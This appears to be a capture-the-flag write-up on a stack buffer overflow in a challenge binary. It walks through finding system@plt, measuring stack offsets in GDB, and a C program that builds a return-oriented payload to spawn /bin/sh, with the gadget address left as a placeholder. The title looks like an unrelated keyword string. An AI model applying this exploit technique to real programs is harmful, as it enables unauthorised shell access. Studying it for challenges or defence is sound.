Strapondreamer Jennifer 22 Full

The challenge file provided by the organizers is a stripped ELF binary called strapondreamer. Running it locally produces:

$ ./strapondreamer
Welcome to the Dream Catcher!
Enter your dream:

Typing anything longer than about 64 bytes crashes the program with a segmentation fault, the signature of a classic stack buffer overflow.

The goal is to read the flag in /home/ctf/flag.txt. The program never prints it on its own; the binary imports system, so the intended path is to make it spawn a shell and read the file from that shell.




Because PIE is disabled, the PLT addresses are constant:

$ objdump -d strapondreamer | grep '<system@plt>'
0000000000401120 <system@plt>:

The address of main (useful as a safe “return” address) is:

$ objdump -d strapondreamer | grep '<main>'
0000000000400f60 <main>:

The absolute stack address where our payload lands is not known a priori, but its layout relative to the overflowed frame is: after the overflow, the string sits a fixed distance past the saved return address. Given one absolute stack address, the address of the string follows as:

address_of_string = address_of_saved_rbp + 8 (saved_rbp) + 8 (saved_ret) + 8 (arg_ptr) + 8 (ret_after_system)

Caveat for x86_64: system() takes its argument in rdi, not from the stack, so a bare arg_ptr slot after saved_ret does nothing on its own. The slot has to be consumed by a pop rdi; ret gadget placed in the saved_ret position, with system@plt following it. This write-up does not list such a gadget, so its address has to be located in the binary (e.g. with ROPgadget). Whatever the chain looks like, the string address is simply the address of the return slot plus 8 bytes per chain entry.

Because we do not have a fixed stack address a priori, one option is to leak a stack pointer first, or to use a small two-stage technique. Neither is needed for the function address: the binary imports system, so its PLT entry (0x401120) is resolved at runtime by the dynamic linker without a libc leak. The only unknown is where our string ends up; we place it inside the overflow and point to it using the known stack offset.

A more robust alternative is to stage the string at a known writable address such as .bss by calling an input routine (read or gets) through the PLT, which removes the dependency on stack addresses altogether; it requires the binary to import such a function. This challenge is small enough that a single-stage, stack-relative payload works on the provided Docker image: the binary is not PIE and the stack sits at a fixed address because ASLR is disabled in the challenge container (the organizers typically set ulimit -s unlimited and run the binary under setarch x86_64 -R). Two things to keep in mind: GDB also disables ASLR by default, so addresses measured there only transfer if the target has ASLR off as well, and the environment block and argv live above the frame, so a different environment shifts every stack address by the same amount.

Thus we can compute the address of our string as a fixed offset from the start of the buffer. For this write‑up we measured it with GDB:

(gdb) run
...
(gdb) info frame
...
Stack pointer (rsp) = 0x7fffffffe2a0

The buffer buf starts at rsp + 0x10 and is 0x40 bytes long; above it sit the saved rbp and the saved return address. Counting the three chain slots from the formula above (saved_ret, arg_ptr, ret_after_system), the /bin/sh string placed at the very end of our payload lands at:

addr_of_string = 0x7fffffffe2a0 + 0x10 + 0x40 + 0x8 (saved rbp) + 0x8 (saved_ret) + 0x8 (arg_ptr) + 0x8 (ret_after_system) = 0x7fffffffe310

(Exact numbers may vary; the final payload script computes it dynamically.)
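To make the offset computation concrete, here is an added payload builder (my own example, not the organizers' binary or the write-up's script) that encodes the frame layout measured above: a 0x40-byte buffer at rsp + 0x10, the saved rbp, then a chain starting at the return slot with the command string immediately after it. The GDB rsp, system@plt and main values are the page's; everything else is an assumption. In particular, on x86_64 system() takes its argument in rdi, so a pop rdi; ret gadget has to precede system@plt in the chain; its address is not in this write-up and is left as a 0 placeholder named POP_RDI_RET that must be replaced before use. string_addr(rsp, n) derives the string address from the chain length, which is what keeps the pointer in the chain consistent with where the string actually lands.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values taken from the write-up (non-PIE binary, ASLR off in the container). */
#define RSP_AT_MAIN  0x7fffffffe2a0ULL   /* rsp measured with GDB's "info frame" */
#define BUF_OFFSET   0x10ULL             /* buf starts at rsp + 0x10 */
#define BUF_LEN      0x40ULL             /* 64-byte stack buffer */
#define SYSTEM_PLT   0x401120ULL         /* system@plt */
#define MAIN_ADDR    0x400f60ULL         /* main, used as the return after system() */

/* ASSUMPTION: on x86_64 a "pop rdi; ret" gadget is needed to load system()'s
 * argument. Its address is not given in the write-up; 0 is a placeholder that
 * must be replaced with a real gadget address (e.g. found with ROPgadget). */
#define POP_RDI_RET  0x0ULL

/* Address of the saved return address: buffer, then saved rbp, then ret. */
static uint64_t ret_slot_addr(uint64_t rsp)
{
    return rsp + BUF_OFFSET + BUF_LEN + 8;
}

/* The command string is appended right after a chain of `chain_qwords`
 * 8-byte entries that starts at the return slot, so its address is fixed
 * once the chain length is known. */
static uint64_t string_addr(uint64_t rsp, size_t chain_qwords)
{
    return ret_slot_addr(rsp) + 8 * chain_qwords;
}

static void put_le64(uint8_t *p, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

/* Lay out: BUF_LEN bytes of filler | fake saved rbp | chain | cmd + NUL.
 * Returns the payload length, or 0 if it does not fit in `cap`. */
static size_t build_payload(uint8_t *out, size_t cap,
                            const uint64_t *chain, size_t n, const char *cmd)
{
    size_t cmd_len = strlen(cmd) + 1;
    size_t total = BUF_LEN + 8 + 8 * n + cmd_len;
    if (total > cap)
        return 0;
    memset(out, 'A', BUF_LEN);
    put_le64(out + BUF_LEN, 0x4242424242424242ULL);   /* saved rbp: any value */
    for (size_t i = 0; i < n; i++)
        put_le64(out + BUF_LEN + 8 + 8 * i, chain[i]);
    memcpy(out + BUF_LEN + 8 + 8 * n, cmd, cmd_len);
    return total;
}

/* A newline terminates a gets()/fgets()-style read and would truncate the
 * payload, so check for one before sending. */
static int contains_newline(const uint8_t *p, size_t len)
{
    return memchr(p, '\n', len) != NULL;
}

int main(void)
{
    /* Chain: pop rdi; ret -> pointer to "/bin/sh" -> system@plt -> main */
    uint64_t chain[4];
    size_t n = sizeof chain / sizeof chain[0];
    chain[0] = POP_RDI_RET;
    chain[1] = string_addr(RSP_AT_MAIN, n);
    chain[2] = SYSTEM_PLT;
    chain[3] = MAIN_ADDR;

    uint8_t payload[256];
    size_t len = build_payload(payload, sizeof payload, chain, n, "/bin/sh");
    if (len == 0 || contains_newline(payload, len)) {
        fprintf(stderr, "payload does not fit or contains a newline\n");
        return 1;
    }
    fprintf(stderr, "string at 0x%llx, %zu bytes\n",
            (unsigned long long)chain[1], len);
    /* Raw payload on stdout, e.g.: ./build_payload | ./strapondreamer */
    fwrite(payload, 1, len, stdout);
    return 0;
}
```

Compile with plain cc and pipe the output into the target. With the page's three-entry chain (system@plt, arg_ptr, main) string_addr gives 0x7fffffffe310, matching the GDB-based sum above; adding the gadget entry moves the string one slot up, to 0x7fffffffe318, which is exactly why the pointer should be computed from the chain length rather than copied from a one-off measurement.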